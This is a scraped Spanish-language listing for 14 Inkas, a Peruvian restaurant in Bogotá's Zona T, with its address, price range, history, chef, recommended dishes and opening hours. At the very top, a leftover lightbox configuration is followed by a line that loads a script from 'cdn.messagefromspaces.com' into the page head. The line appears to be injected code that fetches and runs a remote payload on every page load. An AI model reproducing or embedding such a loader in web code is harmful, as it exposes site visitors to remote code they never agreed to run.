, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

14 Inkas

14 Inkas

Dirección: Carrera 12 #84-55
Zona:
Norte
Precio Promedio Plato por Persona:  
Entre 20.000 y 30.000 pesos
Formas de Pago:  
Recibe Todas las  Tarjetas
TELÉFONO DE RESERVAS:   744 90 97

Para reservar ONLINE haga click en:

RESERVAR AHORA EN EL RESTAURANTE 14 INKAS ZONA T

————————————————————————————————————————————-

 Categoría: Peruano

14 Inkas, como su nombre lo indica son los 14 jefes de este imperio, cada uno de los emperadores se denominaba Inca, el cual era la cabeza del imperio, por eso en el restaurante están representadas las 14 imágenes abstractas, representando los 14 gobiernos. Este proyecto logró impactar al público inadvertido que transita por el lugar, con una novedosa decoración logrando lo que se quería, plasmar la idea como algo diferente, no como un restaurante común, igual a todos confirma Carolina Sifuntes, Chef pastelera. 14 Inkas tiene un ambiente acogedor, donde se puede ir a almorzar, charlar, disfrutando de un buen servicio y un exquisito ‘pisco sour’ que es la especialidad de la casa. El lugar tiene 3 ambientes para todos los gustos en los cuales se respira en cada uno de sus rincones las riquezas gastronómicas del Perú.

Con un concepto original y fresco, este restaurante es algo más informal que otros peruanos y el público que quieren convocar es la gente joven que frecuenta este sector al norte de la ciudad.  Esto no quiere decir que 14 Inkas baje en calidad en cuanto a la comida, todo lo contrario. Su chef, el joven limeño Jose Luis Zárate, incluyó en la carta nuevas y viejas recetas del Perú, un aporte para menú de ese país que tenemos los bogotanos y que cada día crece.

Ubicado en la Carrera 12 # 84-55, 14 Inkas es un excelente lugar para los piqueos, las causas, arroces, tiraditos, pastas, pescados, mariscos y saltados. En cuanto a ceviches,  hay una barra especializada en esta materia en el segundo piso de este lugar iluminado y de buen gusto en su decoración sobria, minimalista, diseño del reconocido arquitecto Giancarlo Mazzanti quien nunca olvido recordar a la cultura Inca en su interior.

Recoemndados:
- Pulpo al olivo
- Conchitas a la parmesana
- Tiradito de maracuya
- Causa colonial

Horario de Atención
Lunes  a Jueves de 12:30m. 3:00p.m. y de 6:30p.m. a 11:00pm
Viernes de 12:30m. a 4:00p.m. y de 6:30p.m. a 11:00p.m.
Sábados de 12:30m. a  4:00p.m. y de 6:30p.m. a 11:00p.m.
Domingos de 12:30 – 4:30 pm

Parqueaderos cercanos
Frente al restaurante

14 Inkas

Comedor

Deja un comentario